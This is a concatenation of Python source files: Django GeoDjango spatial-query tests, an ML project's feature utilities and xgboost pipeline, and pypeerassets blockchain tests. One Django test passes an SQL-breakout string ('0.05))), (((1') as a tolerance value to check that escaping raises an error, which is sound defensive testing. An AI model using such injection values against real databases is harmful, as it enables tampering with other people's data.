geom=Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))),
).save()
Feature(
name="GeometryCollection",
geom=GeometryCollection(
Point(2, 2),
LineString((0, 0), (2, 2)),
Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))),
),
).save()
f_1 = Feature.objects.get(name="Point")
self.assertIsInstance(f_1.geom, Point)
self.assertEqual((1.0, 1.0), f_1.geom.tuple)
f_2 = Feature.objects.get(name="LineString")
self.assertIsInstance(f_2.geom, LineString)
self.assertEqual(((0.0, 0.0), (1.0, 1.0), (5.0, 5.0)), f_2.geom.tuple)
f_3 = Feature.objects.get(name="Polygon")
self.assertIsInstance(f_3.geom, Polygon)
f_4 = Feature.objects.get(name="GeometryCollection")
self.assertIsInstance(f_4.geom, GeometryCollection)
self.assertEqual(f_3.geom, f_4.geom[2])
@skipUnlessDBFeature("supports_transform")
def test_inherited_geofields(self):
"Database functions on inherited Geometry fields."
# Creating a Pennsylvanian city.
PennsylvaniaCity.objects.create(
name="Mansfield", county="Tioga", point="POINT(-77.071445 41.823881)"
)
# All transformation SQL will need to be performed on the
# _parent_ table.
qs = PennsylvaniaCity.objects.annotate(
new_point=functions.Transform("point", srid=32128)
)
self.assertEqual(1, qs.count())
for pc in qs:
self.assertEqual(32128, pc.new_point.srid)
def test_raw_sql_query(self):
"Testing raw SQL query."
cities1 = City.objects.all()
point_select = connection.ops.select % "point"
cities2 = list(
City.objects.raw(
"select id, name, %s as point from geoapp_city" % point_select
)
)
self.assertEqual(len(cities1), len(cities2))
with self.assertNumQueries(0): # Ensure point isn't deferred.
self.assertIsInstance(cities2[0].point, Point)
def test_dumpdata_loaddata_cycle(self):
"""
Test a dumpdata/loaddata cycle with geographic data.
"""
out = StringIO()
original_data = list(City.objects.order_by("name"))
call_command("dumpdata", "geoapp.City", stdout=out)
result = out.getvalue()
houston = City.objects.get(name="Houston")
self.assertIn('"point": "%s"' % houston.point.ewkt, result)
# Reload now dumped data
with tempfile.NamedTemporaryFile(mode="w", suffix=".json") as tmp:
tmp.write(result)
tmp.seek(0)
call_command("loaddata", tmp.name, verbosity=0)
self.assertEqual(original_data, list(City.objects.order_by("name")))
@skipUnlessDBFeature("supports_empty_geometries")
def test_empty_geometries(self):
geometry_classes = [
Point,
LineString,
LinearRing,
Polygon,
MultiPoint,
MultiLineString,
MultiPolygon,
GeometryCollection,
]
for klass in geometry_classes:
g = klass(srid=4326)
feature = Feature.objects.create(name="Empty %s" % klass.__name__, geom=g)
feature.refresh_from_db()
if klass is LinearRing:
                # LinearRing isn't representable in WKB, so GEOSGeometry.wkb
# uses LineString instead.
g = LineString(srid=4326)
self.assertEqual(feature.geom, g)
self.assertEqual(feature.geom.srid, g.srid)
class GeoLookupTest(TestCase):
fixtures = ["initial"]
def test_disjoint_lookup(self):
"Testing the `disjoint` lookup type."
ptown = City.objects.get(name="Pueblo")
qs1 = City.objects.filter(point__disjoint=ptown.point)
self.assertEqual(7, qs1.count())
qs2 = State.objects.filter(poly__disjoint=ptown.point)
self.assertEqual(1, qs2.count())
self.assertEqual("Kansas", qs2[0].name)
def test_contains_contained_lookups(self):
"Testing the 'contained', 'contains', and 'bbcontains' lookup types."
# Getting Texas, yes we were a country -- once ;)
texas = Country.objects.get(name="Texas")
# Seeing what cities are in Texas, should get Houston and Dallas,
# and Oklahoma City because 'contained' only checks on the
# _bounding box_ of the Geometries.
if connection.features.supports_contained_lookup:
qs = City.objects.filter(point__contained=texas.mpoly)
self.assertEqual(3, qs.count())
cities = ["Houston", "Dallas", "Oklahoma City"]
for c in qs:
self.assertIn(c.name, cities)
# Pulling out some cities.
houston = City.objects.get(name="Houston")
wellington = City.objects.get(name="Wellington")
pueblo = City.objects.get(name="Pueblo")
okcity = City.objects.get(name="Oklahoma City")
lawrence = City.objects.get(name="Lawrence")
# Now testing contains on the countries using the points for
# Houston and Wellington.
tx = Country.objects.get(mpoly__contains=houston.point) # Query w/GEOSGeometry
nz = Country.objects.get(
mpoly__contains=wellington.point.hex
) # Query w/EWKBHEX
self.assertEqual("Texas", tx.name)
self.assertEqual("New Zealand", nz.name)
# Testing `contains` on the states using the point for Lawrence.
ks = State.objects.get(poly__contains=lawrence.point)
self.assertEqual("Kansas", ks.name)
# Pueblo and Oklahoma City (even though OK City is within the bounding
# box of Texas) are not contained in Texas or New Zealand.
self.assertEqual(
len(Country.objects.filter(mpoly__contains=pueblo.point)), 0
) # Query w/GEOSGeometry object
self.assertEqual(
len(Country.objects.filter(mpoly__contains=okcity.point.wkt)), 0
) # Query w/WKT
# OK City is contained w/in bounding box of Texas.
if connection.features.supports_bbcontains_lookup:
qs = Country.objects.filter(mpoly__bbcontains=okcity.point)
self.assertEqual(1, len(qs))
self.assertEqual("Texas", qs[0].name)
@skipUnlessDBFeature("supports_crosses_lookup")
def test_crosses_lookup(self):
Track.objects.create(name="Line1", line=LineString([(-95, 29), (-60, 0)]))
self.assertEqual(
Track.objects.filter(
line__crosses=LineString([(-95, 0), (-60, 29)])
).count(),
1,
)
self.assertEqual(
Track.objects.filter(
line__crosses=LineString([(-95, 30), (0, 30)])
).count(),
0,
)
@skipUnlessDBFeature("supports_isvalid_lookup")
def test_isvalid_lookup(self):
invalid_geom = fromstr("POLYGON((0 0, 0 1, 1 1, 1 0, 1 1, 1 0, 0 0))")
State.objects.create(name="invalid", poly=invalid_geom)
qs = State.objects.all()
if connection.ops.oracle or (
connection.ops.mysql and connection.mysql_version < (8, 0, 0)
):
# Kansas has adjacent vertices with distance 6.99244813842e-12
# which is smaller than the default Oracle tolerance.
# It's invalid on MySQL < 8 also.
qs = qs.exclude(name="Kansas")
self.assertEqual(
State.objects.filter(name="Kansas", poly__isvalid=False).count(), 1
)
self.assertEqual(qs.filter(poly__isvalid=False).count(), 1)
self.assertEqual(qs.filter(poly__isvalid=True).count(), qs.count() - 1)
@skipUnlessGISLookup("left", "right")
def test_left_right_lookups(self):
"Testing the 'left' and 'right' lookup types."
# Left: A << B => true if xmax(A) < xmin(B)
# Right: A >> B => true if xmin(A) > xmax(B)
# See: BOX2D_left() and BOX2D_right() in lwgeom_box2dfloat4.c in PostGIS source.
# Getting the borders for Colorado & Kansas
co_border = State.objects.get(name="Colorado").poly
ks_border = State.objects.get(name="Kansas").poly
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
# These cities should be strictly to the right of the CO border.
cities = [
"Houston",
"Dallas",
"Oklahoma City",
"Lawrence",
"Chicago",
"Wellington",
]
qs = City.objects.filter(point__right=co_border)
self.assertEqual(6, len(qs))
for c in qs:
self.assertIn(c.name, cities)
# These cities should be strictly to the right of the KS border.
cities = ["Chicago", "Wellington"]
qs = City.objects.filter(point__right=ks_border)
self.assertEqual(2, len(qs))
for c in qs:
self.assertIn(c.name, cities)
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
vic = City.objects.get(point__left=co_border)
self.assertEqual("Victoria", vic.name)
cities = ["Pueblo", "Victoria"]
qs = City.objects.filter(point__left=ks_border)
self.assertEqual(2, len(qs))
for c in qs:
self.assertIn(c.name, cities)
@skipUnlessGISLookup("strictly_above", "strictly_below")
def test_strictly_above_below_lookups(self):
dallas = City.objects.get(name="Dallas")
self.assertQuerysetEqual(
City.objects.filter(point__strictly_above=dallas.point).order_by("name"),
["Chicago", "Lawrence", "Oklahoma City", "Pueblo", "Victoria"],
lambda b: b.name,
)
self.assertQuerysetEqual(
City.objects.filter(point__strictly_below=dallas.point).order_by("name"),
["Houston", "Wellington"],
lambda b: b.name,
)
def test_equals_lookups(self):
"Testing the 'same_as' and 'equals' lookup types."
pnt = fromstr("POINT (-95.363151 29.763374)", srid=4326)
c1 = City.objects.get(point=pnt)
c2 = City.objects.get(point__same_as=pnt)
c3 = City.objects.get(point__equals=pnt)
for c in [c1, c2, c3]:
self.assertEqual("Houston", c.name)
@skipUnlessDBFeature("supports_null_geometries")
def test_null_geometries(self):
"Testing NULL geometry support, and the `isnull` lookup type."
# Creating a state with a NULL boundary.
State.objects.create(name="Puerto Rico")
# Querying for both NULL and Non-NULL values.
nullqs = State.objects.filter(poly__isnull=True)
validqs = State.objects.filter(poly__isnull=False)
# Puerto Rico should be NULL (it's a commonwealth unincorporated territory)
self.assertEqual(1, len(nullqs))
self.assertEqual("Puerto Rico", nullqs[0].name)
# GeometryField=None is an alias for __isnull=True.
self.assertCountEqual(State.objects.filter(poly=None), nullqs)
self.assertCountEqual(State.objects.exclude(poly=None), validqs)
# The valid states should be Colorado & Kansas
self.assertEqual(2, len(validqs))
state_names = [s.name for s in validqs]
self.assertIn("Colorado", state_names)
self.assertIn("Kansas", state_names)
# Saving another commonwealth w/a NULL geometry.
nmi = State.objects.create(name="Northern Mariana Islands", poly=None)
self.assertIsNone(nmi.poly)
# Assigning a geometry and saving -- then UPDATE back to NULL.
nmi.poly = "POLYGON((0 0,1 0,1 1,1 0,0 0))"
nmi.save()
State.objects.filter(name="Northern Mariana Islands").update(poly=None)
self.assertIsNone(State.objects.get(name="Northern Mariana Islands").poly)
@skipUnlessDBFeature(
"supports_null_geometries", "supports_crosses_lookup", "supports_relate_lookup"
)
def test_null_geometries_excluded_in_lookups(self):
"""NULL features are excluded in spatial lookup functions."""
null = State.objects.create(name="NULL", poly=None)
queries = [
("equals", Point(1, 1)),
("disjoint", Point(1, 1)),
("touches", Point(1, 1)),
("crosses", LineString((0, 0), (1, 1), (5, 5))),
("within", Point(1, 1)),
("overlaps", LineString((0, 0), (1, 1), (5, 5))),
("contains", LineString((0, 0), (1, 1), (5, 5))),
("intersects", LineString((0, 0), (1, 1), (5, 5))),
("relate", (Point(1, 1), "T*T***FF*")),
("same_as", Point(1, 1)),
("exact", Point(1, 1)),
("coveredby", Point(1, 1)),
("covers", Point(1, 1)),
]
for lookup, geom in queries:
with self.subTest(lookup=lookup):
self.assertNotIn(
null, State.objects.filter(**{"poly__%s" % lookup: geom})
)
def test_wkt_string_in_lookup(self):
# Valid WKT strings don't emit error logs.
with self.assertNoLogs("django.contrib.gis", "ERROR"):
State.objects.filter(poly__intersects="LINESTRING(0 0, 1 1, 5 5)")
@skipUnlessDBFeature("supports_relate_lookup")
def test_relate_lookup(self):
"Testing the 'relate' lookup type."
# To make things more interesting, we will have our Texas reference point in
# different SRIDs.
pnt1 = fromstr("POINT (649287.0363174 4177429.4494686)", srid=2847)
pnt2 = fromstr("POINT(-98.4919715741052 29.4333344025053)", srid=4326)
# Not passing in a geometry as first param raises a TypeError when
# initializing the QuerySet.
with self.assertRaises(ValueError):
Country.objects.filter(mpoly__relate=(23, "foo"))
# Making sure the right exception is raised for the given
# bad arguments.
for bad_args, e in [
((pnt1, 0), ValueError),
((pnt2, "T*T***FF*", 0), ValueError),
]:
qs = Country.objects.filter(mpoly__relate=bad_args)
with self.assertRaises(e):
qs.count()
contains_mask = "T*T***FF*"
within_mask = "T*F**F***"
intersects_mask = "T********"
# Relate works differently on Oracle.
if connection.ops.oracle:
contains_mask = "contains"
within_mask = "inside"
# TODO: This is not quite the same as the PostGIS mask above
intersects_mask = "overlapbdyintersect"
# Testing contains relation mask.
if connection.features.supports_transform:
self.assertEqual(
Country.objects.get(mpoly__relate=(pnt1, contains_mask)).name,
"Texas",
)
self.assertEqual(
"Texas", Country.objects.get(mpoly__relate=(pnt2, contains_mask)).name
)
# Testing within relation mask.
ks = State.objects.get(name="Kansas")
self.assertEqual(
"Lawrence", City.objects.get(point__relate=(ks.poly, within_mask)).name
)
# Testing intersection relation mask.
if not connection.ops.oracle:
if connection.features.supports_transform:
self.assertEqual(
Country.objects.get(mpoly__relate=(pnt1, intersects_mask)).name,
"Texas",
)
self.assertEqual(
"Texas", Country.objects.get(mpoly__relate=(pnt2, intersects_mask)).name
)
self.assertEqual(
"Lawrence",
City.objects.get(point__relate=(ks.poly, intersects_mask)).name,
)
# With a complex geometry expression
mask = "anyinteract" if connection.ops.oracle else within_mask
self.assertFalse(
City.objects.exclude(
point__relate=(functions.Union("point", "point"), mask)
)
)
def test_gis_lookups_with_complex_expressions(self):
multiple_arg_lookups = {
"dwithin",
"relate",
} # These lookups are tested elsewhere.
lookups = connection.ops.gis_operators.keys() - multiple_arg_lookups
self.assertTrue(lookups, "No lookups found")
for lookup in lookups:
with self.subTest(lookup):
City.objects.filter(
**{"point__" + lookup: functions.Union("point", "point")}
).exists()
def test_subquery_annotation(self):
multifields = MultiFields.objects.create(
city=City.objects.create(point=Point(1, 1)),
point=Point(2, 2),
poly=Polygon.from_bbox((0, 0, 2, 2)),
)
qs = MultiFields.objects.annotate(
city_point=Subquery(
City.objects.filter(
id=OuterRef("city"),
).values("point")
),
).filter(
city_point__within=F("poly"),
)
self.assertEqual(qs.get(), multifields)
class GeoQuerySetTest(TestCase):
# TODO: GeoQuerySet is removed, organize these test better.
fixtures = ["initial"]
@skipUnlessDBFeature("supports_extent_aggr")
def test_extent(self):
"""
Testing the `Extent` aggregate.
"""
# Reference query:
# SELECT ST_extent(point)
# FROM geoapp_city
# WHERE (name='Houston' or name='Dallas');`
# => BOX(-96.8016128540039 29.7633724212646,-95.3631439208984 32.7820587158203)
expected = (
-96.8016128540039,
29.7633724212646,
-95.3631439208984,
32.782058715820,
)
qs = City.objects.filter(name__in=("Houston", "Dallas"))
extent = qs.aggregate(Extent("point"))["point__extent"]
for val, exp in zip(extent, expected):
self.assertAlmostEqual(exp, val, 4)
self.assertIsNone(
City.objects.filter(name=("Smalltown")).aggregate(Extent("point"))[
"point__extent"
]
)
@skipUnlessDBFeature("supports_extent_aggr")
def test_extent_with_limit(self):
"""
Testing if extent supports limit.
"""
extent1 = City.objects.aggregate(Extent("point"))["point__extent"]
extent2 = City.objects.all()[:3].aggregate(Extent("point"))["point__extent"]
self.assertNotEqual(extent1, extent2)
def test_make_line(self):
"""
Testing the `MakeLine` aggregate.
"""
if not connection.features.supports_make_line_aggr:
with self.assertRaises(NotSupportedError):
City.objects.aggregate(MakeLine("point"))
return
# MakeLine on an inappropriate field returns simply None
self.assertIsNone(State.objects.aggregate(MakeLine("poly"))["poly__makeline"])
# Reference query:
# SELECT AsText(ST_MakeLine(geoapp_city.point)) FROM geoapp_city;
ref_line = GEOSGeometry(
"LINESTRING(-95.363151 29.763374,-96.801611 32.782057,"
"-97.521157 34.464642,174.783117 -41.315268,-104.609252 38.255001,"
"-95.23506 38.971823,-87.650175 41.850385,-123.305196 48.462611)",
srid=4326,
)
# We check for equality with a tolerance of 10e-5 which is a lower bound
# of the precisions of ref_line coordinates
line = City.objects.aggregate(MakeLine("point"))["point__makeline"]
self.assertTrue(
ref_line.equals_exact(line, tolerance=10e-5), "%s != %s" % (ref_line, line)
)
@skipUnlessDBFeature("supports_union_aggr")
def test_unionagg(self):
"""
Testing the `Union` aggregate.
"""
tx = Country.objects.get(name="Texas").mpoly
# Houston, Dallas -- Ordering may differ depending on backend or GEOS version.
union = GEOSGeometry("MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)")
qs = City.objects.filter(point__within=tx)
with self.assertRaises(ValueError):
qs.aggregate(Union("name"))
# Using `field_name` keyword argument in one query and specifying an
# order in the other (which should not be used because this is
# an aggregate method on a spatial column)
u1 = qs.aggregate(Union("point"))["point__union"]
u2 = qs.order_by("name").aggregate(Union("point"))["point__union"]
self.assertTrue(union.equals(u1))
self.assertTrue(union.equals(u2))
qs = City.objects.filter(name="NotACity")
self.assertIsNone(qs.aggregate(Union("point"))["point__union"])
@skipUnlessDBFeature("supports_union_aggr")
def test_geoagg_subquery(self):
tx = Country.objects.get(name="Texas")
union = GEOSGeometry("MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)")
# Use distinct() to force the usage of a subquery for aggregation.
with CaptureQueriesContext(connection) as ctx:
self.assertIs(
union.equals(
City.objects.filter(point__within=tx.mpoly)
.distinct()
.aggregate(
Union("point"),
)["point__union"],
),
True,
)
self.assertIn("subquery", ctx.captured_queries[0]["sql"])
@skipUnlessDBFeature("supports_tolerance_parameter")
def test_unionagg_tolerance(self):
City.objects.create(
point=fromstr("POINT(-96.467222 32.751389)", srid=4326),
name="Forney",
)
tx = Country.objects.get(name="Texas").mpoly
# Tolerance is greater than distance between Forney and Dallas, that's
# why Dallas is ignored.
forney_houston = GEOSGeometry(
"MULTIPOINT(-95.363151 29.763374, -96.467222 32.751389)",
srid=4326,
)
self.assertIs(
forney_houston.equals_exact(
City.objects.filter(point__within=tx).aggregate(
Union("point", tolerance=32000),
)["point__union"],
tolerance=10e-6,
),
True,
)
@skipUnlessDBFeature("supports_tolerance_parameter")
def test_unionagg_tolerance_escaping(self):
tx = Country.objects.get(name="Texas").mpoly
with self.assertRaises(DatabaseError):
City.objects.filter(point__within=tx).aggregate(
Union("point", tolerance="0.05))), (((1"),
)
def test_within_subquery(self):
"""
Using a queryset inside a geo lookup is working (using a subquery)
(#14483).
"""
tex_cities = City.objects.filter(
point__within=Country.objects.filter(name="Texas").values("mpoly")
).order_by("name")
self.assertEqual(
list(tex_cities.values_list("name", flat=True)), ["Dallas", "Houston"]
)
def test_non_concrete_field(self):
NonConcreteModel.objects.create(point=Point(0, 0), name="name")
list(NonConcreteModel.objects.all())
def test_values_srid(self):
for c, v in zip(City.objects.all(), City.objects.values()):
self.assertEqual(c.point.srid, v["point"].srid)
``` |
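The GEOS layer these tests lean on can also be exercised without a spatial database; a standalone sketch (it needs only the GEOS library that `django.contrib.gis.geos` wraps):
```python
from django.contrib.gis.geos import Point, fromstr

# fromstr() parses WKT into a GEOSGeometry; equality compares SRID and
# coordinates, so this round trip holds exactly.
pnt = fromstr("POINT(-95.363151 29.763374)", srid=4326)
assert pnt == Point(-95.363151, 29.763374, srid=4326)
assert pnt.wkt.startswith("POINT")
```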
{
"source": "jo-m/ml-projects",
"score": 3
} |
#### File: ml-projects/project1/utils.py
```python
from scipy.stats import pearsonr
import matplotlib.pyplot as plt
import numpy as np
# compute correlation between features
def compute_correlation(Xtrain):
for i in range(0, Xtrain.shape[1]):
for j in range(i+1, Xtrain.shape[1]):
correlation = pearsonr(Xtrain[:, i], Xtrain[:, j])[0]
if correlation > 0.3 or correlation < -0.3:
                print('correlation between', i, 'and', j, 'feature is', correlation)
# plot features with y, x sorted
def plotFeatures(X, Y):
MAX_FEATURES = 15
Y = np.exp(Y)
permY = np.argsort(Y, axis=0)
plt.title("Y")
plt.plot(Y[permY])
plt.show()
    for i in range(0, min(MAX_FEATURES, X.shape[1])):  # builtin min: np.min(a, b) reads b as an axis
column = X[:, i]
perm = np.argsort(column, axis=0)
plt.title("feature " + str(i))
plt.plot(column[perm], Y[perm], 'bo')
plt.show()
```
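A hypothetical smoke test for the two helpers above; the engineered second column exists only to trip the |r| > 0.3 threshold, and `plotFeatures` opens one window per feature:
```python
import numpy as np

X = np.random.rand(200, 4)
X[:, 1] = 2 * X[:, 0] + 0.01 * np.random.rand(200)  # strongly correlated pair
compute_correlation(X)                # should report the (0, 1) pair
plotFeatures(X, np.log(X[:, 0] + 1))  # pass log values: plotFeatures exp()s Y back
```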
#### File: ml-projects/project3/process.py
```python
import pandas as pd
from sklearn.grid_search import GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from datetime import datetime
import xgboost as xgb
import sklearn.cross_validation as skcv
import sklearn.metrics as skmet
from utils import *
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.cross_validation import KFold
def load_data(train=True):
if train:
fname = 'data/train.csv'
else:
fname = 'data/test_validate.csv'
dataT = pd.read_csv(fname,
index_col=None,
header=None)
dataT = dataT.as_matrix().astype(float)
if train:
dataT = dataT[:, :-1]
if train:
name = 'data/train_labels.csv'
Y = pd.read_csv(name,
index_col=None,
header=None)
# labels also have index as the first column
Y = Y[1].as_matrix().astype(int)
else:
Y = None
return dataT, Y
def score(Ytruth, Ypred):
Ytruth = Ytruth.ravel()
Ypred = Ypred.ravel()
if Ytruth.ndim != 1:
raise Exception('Ytruth has invalid shape!')
if Ypred.ndim != 1:
raise Exception('Ypred has invalid shape!')
    # avoid shadowing builtin sum(); np.product was removed in NumPy 2.0
    n_correct = (Ytruth == Ypred).astype(float).sum()
    return n_correct / np.prod(Ytruth.shape)
def run_crossval(X, Y, model):
scores = []
kf = KFold(X.shape[0], n_folds=10)
for train, test in kf:
model.fit(X[train], Y[train])
Ypred = model.predict(X[test])
sc = score(Y[test], Ypred)
scores.append(sc)
    print('C-V score %s' % str(np.mean(scores)))
    print('std %s' % str(np.std(scores)))
def run_split(X, Y, model):
Xtrain, Xtest, Ytrain, Ytest = skcv.train_test_split(X, Y, train_size=.9)
Xtrain, Xtest = Xtrain[:, 1:], Xtest[:, 1:]
model.fit(Xtrain, Ytrain)
Ypred = model.predict(Xtest)
    scored = score(Ytest, Ypred)  # argument order per score(Ytruth, Ypred)
    print("Split-score = %f" % scored)
return scored
def write_Y(Y):
if Y.shape[1] != 2:
        raise ValueError('Y has invalid shape!')
np.savetxt('results/Ypred{0}.csv'.format(datetime.now().strftime('%Y-%m-%d,%H:%M:%S')), Y,
fmt='%d', delimiter=',', header='Id,Label', comments='')
def run_validate(Xtrain, Ytrain, model):
model.fit(Xtrain[:, 1:], Ytrain)
Xvalidate, _ = load_data(train=False)
Xvalidate_ids = Xvalidate[:, 0]
Yvalidate = model.predict(Xvalidate[:, 1:])
ret = np.vstack((Xvalidate_ids, Yvalidate)).T
write_Y(ret)
    print('wrote validate')
def run_gridsearch(X, Y, model):
parameters = {
'reg__n_estimators': [300, 500, 1250, 1500, 1750, 2500, 3000],
'reg__learning_rate': [0.001, 0.003, 0.005, 0.006, 0.01],
'reg__max_depth': [3, 5, 7, 9],
'reg__subsample': [0.5, 0.7, 0.9],
'selector__k': [100, 120, 150, 200, 300, 400, 'all'],
}
grid = GridSearchCV(model, parameters, verbose=1, n_jobs=-1, cv=5)
grid.fit(X[:, 1:], Y)
for p in parameters.keys():
        print('Gridsearch: param %s = %s' % (
            p, str(grid.best_estimator_.get_params()[p])))
return grid.best_estimator_
def build_pipe():
scaler = Scaler
selector = SelectKBest(chi2, k=120)
regressor = xgb.XGBClassifier(n_estimators=500, learning_rate=0.01, max_depth=5, subsample=0.5)
return Pipeline([
('scaler', scaler),
('selector', selector),
('reg', regressor),
])
Xtrain, Ytrain = load_data()
Scaler = StandardScaler(with_mean=False) # do not subtract the mean,
# chi2 does not accept negative numbers
pipe = build_pipe()
# pipe = run_gridsearch(Xtrain, Ytrain, pipe)
run_crossval(Xtrain, Ytrain, pipe)
run_split(Xtrain, Ytrain, pipe)
run_validate(Xtrain, Ytrain, pipe)
``` |
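A quick sanity check of the `score()` accuracy metric defined above (values are illustrative):
```python
import numpy as np

yt = np.array([1, 0, 1, 1])
yp = np.array([1, 1, 1, 0])
assert score(yt, yp) == 0.5  # 2 of 4 labels agree
```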
{
"source": "jommy99/pypeerassets",
"score": 2
} |
#### File: pypeerassets/test/test_pautils.py
```python
from typing import Generator
import pytest
from pypeerassets import (
Deck,
find_deck
)
from pypeerassets.provider import Cryptoid, Explorer, RpcNode
from pypeerassets.exceptions import *
from pypeerassets.paproto_pb2 import DeckSpawn
from pypeerassets.pautils import *
from pypeerassets.protocol import IssueMode, CardTransfer
from pypeerassets.pa_constants import param_query
@pytest.mark.xfail
def test_load_p2th_privkeys_into_local_node():
provider = RpcNode(testnet=True)
load_p2th_privkeys_into_local_node(provider=provider)
@pytest.mark.parametrize("prov", ["explorer", "cryptoid"])
def test_find_tx_sender(prov):
if prov == "explorer":
provider = Explorer(network="peercoin")
rawtx = provider.getrawtransaction("397bda2f5e6608c872a663b2e5482d95db8ecfad00757823f0f12caa45a213a6", 1)
assert find_tx_sender(provider, rawtx) == 'PNHGzKupyvo2YZVb1CTdRxtCGBB5ykgiug'
if prov == "cryptoid":
provider = Cryptoid(network="peercoin")
rawtx = provider.getrawtransaction("397bda2f5e6608c872a663b2e5482d95db8ecfad00757823f0f12caa45a213a6", 1)
assert find_tx_sender(provider, rawtx) == 'PNHGzKupyvo2YZVb1CTdRxtCGBB5ykgiug'
@pytest.mark.parametrize("prov", ["explorer", "cryptoid"])
def test_find_deck_spawns(prov):
if prov == "explorer":
provider = Explorer(network="peercoin")
if prov == "cryptoid":
provider = Cryptoid(network="peercoin")
assert isinstance(find_deck_spawns(provider), Generator)
@pytest.mark.parametrize("prov", ["rpc", "explorer"])
def test_tx_serialization_order(prov):
if prov == "explorer":
provider = Explorer(network="peercoin-testnet")
assert tx_serialization_order(provider,
txid="f968702bcedc107959aae2c2b1a1becdccbfe7e5a32b460b2c13c1adaa33d541", blockhash="e234d2ef69f7cd1e7ee489546b39314cc838763b4e32438106cba657d9749f2f") == 1
try:
if prov == "rpc":
provider = RpcNode(testnet=True)
assert tx_serialization_order(provider,
txid="f968702bcedc107959aae2c2b1a1becdccbfe7e5a32b460b2c13c1adaa33d541", blockhash="e234d2ef69f7cd1e7ee489546b39314cc838763b4e32438106cba657d9749f2f") == 1
    except Exception:
        print("No RpcNode available.")
def test_read_tx_opreturn():
vout = [{'n': 0,
'scriptPubKey': {'addresses': ['<KEY>'],
'asm': 'OP_DUP OP_HASH160 1e667ee94ea8e62c63fe59a0269bb3c091c86ca3 OP_EQUALVERIFY OP_CHECKSIG',
'hex': '76a9141e667ee94ea8e62c63fe59a0269bb3c091c86ca388ac',
'reqSigs': 1,
'type': 'pubkeyhash'},
'value': 0.01},
{'n': 1,
'scriptPubKey': {'asm': 'OP_RETURN 0801120f736978746f5f726f6472696775657a18052004',
'hex': '6a170801120f736978746f5f726f6472696775657a18052004',
'type': 'nulldata'},
'value': 0}
]
assert isinstance(read_tx_opreturn(vout[1]), bytes)
assert read_tx_opreturn(vout[1]) == b'\x08\x01\x12\x0fsixto_rodriguez\x18\x05 \x04'
def generate_dummy_deck():
return Deck(
name="decky",
number_of_decimals=2,
issue_mode=IssueMode.SINGLET.value,
network="ppc",
production=True,
version=1,
asset_specific_data="just testing.",
)
def test_deck_issue_mode():
'''test enum to issue_mode conversion'''
deck_meta = DeckSpawn()
deck_meta.issue_mode = 3
assert isinstance(deck_issue_mode(deck_meta), Generator)
assert list(deck_issue_mode(deck_meta)) == ['CUSTOM', 'ONCE']
# Check that we handle NONE mode correctly.
deck_meta.issue_mode = 0
assert list(deck_issue_mode(deck_meta)) == ['NONE']
def test_issue_mode_to_enum():
'''test issue mode to enum conversion'''
deck = generate_dummy_deck().metainfo_to_protobuf
deck_meta = DeckSpawn()
deck_meta.ParseFromString(deck)
assert isinstance(issue_mode_to_enum(deck_meta,
["CUSTOM", "SINGLET"]), int)
def test_parse_deckspawn_metainfo():
'''tests if loading of deck parameteres from protobuf works as it should.'''
string = b'\x08\x01\x12\x0cmy_test_deck\x18\x03 \x02'
assert parse_deckspawn_metainfo(string, 1) == {'issue_mode': IssueMode.ONCE.value,
'name': 'my_test_deck',
'number_of_decimals': 3,
'version': 1,
'asset_specific_data': b''
}
string = b'\x08\x01\x18\x05 \x04' # without deck name
with pytest.raises(InvalidDeckMetainfo):
parse_deckspawn_metainfo(string, 1)
def test_validate_deckspawn_p2th():
'''test deckspawn p2th validation'''
provider = Explorer(network="peercoin-testnet")
p2th = param_query('peercoin-testnet').P2TH_addr
raw_tx = provider.getrawtransaction('643dccd585211766fc03f71e92fbf299cfc2bdbf3f2cae0ad85adec3141069f3', 1,)
assert validate_deckspawn_p2th(provider, raw_tx, p2th)
@pytest.mark.xfail
def test_load_deck_p2th_into_local_node():
provider = RpcNode(testnet=True)
deck = generate_dummy_deck()
load_deck_p2th_into_local_node(provider, deck)
def test_validate_card_transfer_p2th():
provider = Cryptoid(network="peercoin-testnet")
deck = find_deck(provider, "643dccd585211766fc03f71e92fbf299cfc2bdbf3f2cae0ad85adec3141069f3", 1)
raw_tx = provider.getrawtransaction("809c506bc3add9e46a4d3a65348426688545213da5fb5b524acd380f2cdaf3cc", 1)
validate_card_transfer_p2th(deck, raw_tx['vout'][0])
def test_parse_card_transfer_metainfo():
card = b'\x08\x01\x12\n\xd0\xd2=\x80\x89z\xee\x83\xb8\x01\x18\x05'
res = parse_card_transfer_metainfo(card, 1)
assert isinstance(res, dict)
def test_card_postprocess():
card = {'amount': [1000000], 'number_of_decimals': 3, 'version': 1}
vout = [
{
"value": 0.01,
"n": 0,
"scriptPubKey": {
"asm": "OP_DUP OP_HASH160 3d9df85b2c05f0c95347e1738034e0653cd61269 OP_EQUALVERIFY OP_CHECKSIG",
"hex": "76a9143d9df85b2c05f0c95347e1738034e0653cd6126988ac",
"reqSigs": 1,
"type": "pubkeyhash",
"addresses": [
"mm8kkiLVQfLtLGJk52KX57SUpjXxvJ7kop"
]
}
},
{
"value": 0,
"n": 1,
"scriptPubKey": {
"asm": "OP_RETURN 080112010a1803",
"hex": "6a07080112010a1803",
"type": "nulldata"
}
},
{
"value": 0,
"n": 2,
"scriptPubKey": {
"asm": "OP_DUP OP_HASH160 5f64e161b433fb843de5e19411e2a02136cda453 OP_EQUALVERIFY OP_CHECKSIG",
"hex": "76a9145f64e161b433fb843de5e19411e2a02136cda45388ac",
"reqSigs": 1,
"type": "pubkeyhash",
"addresses": [
"mpDMLa4N6hskcuJpTkcLTd4HB7Q2yF22bG"
]
}
},
{
"value": 99.92,
"n": 3,
"scriptPubKey": {
"asm": "OP_DUP OP_HASH160 60f36fdcd16dfaba412b50d9a0af53fa2260b6a6 OP_EQUALVERIFY OP_CHECKSIG",
"hex": "76a91460f36fdcd16dfaba412b50d9a0af53fa2260b6a688ac",
"reqSigs": 1,
"type": "pubkeyhash",
"addresses": [
"mpManmQf6CT84xGE5zciktTmWmfHdErUQW"
]
}
}
]
assert isinstance(card_postprocess(card, vout), list)
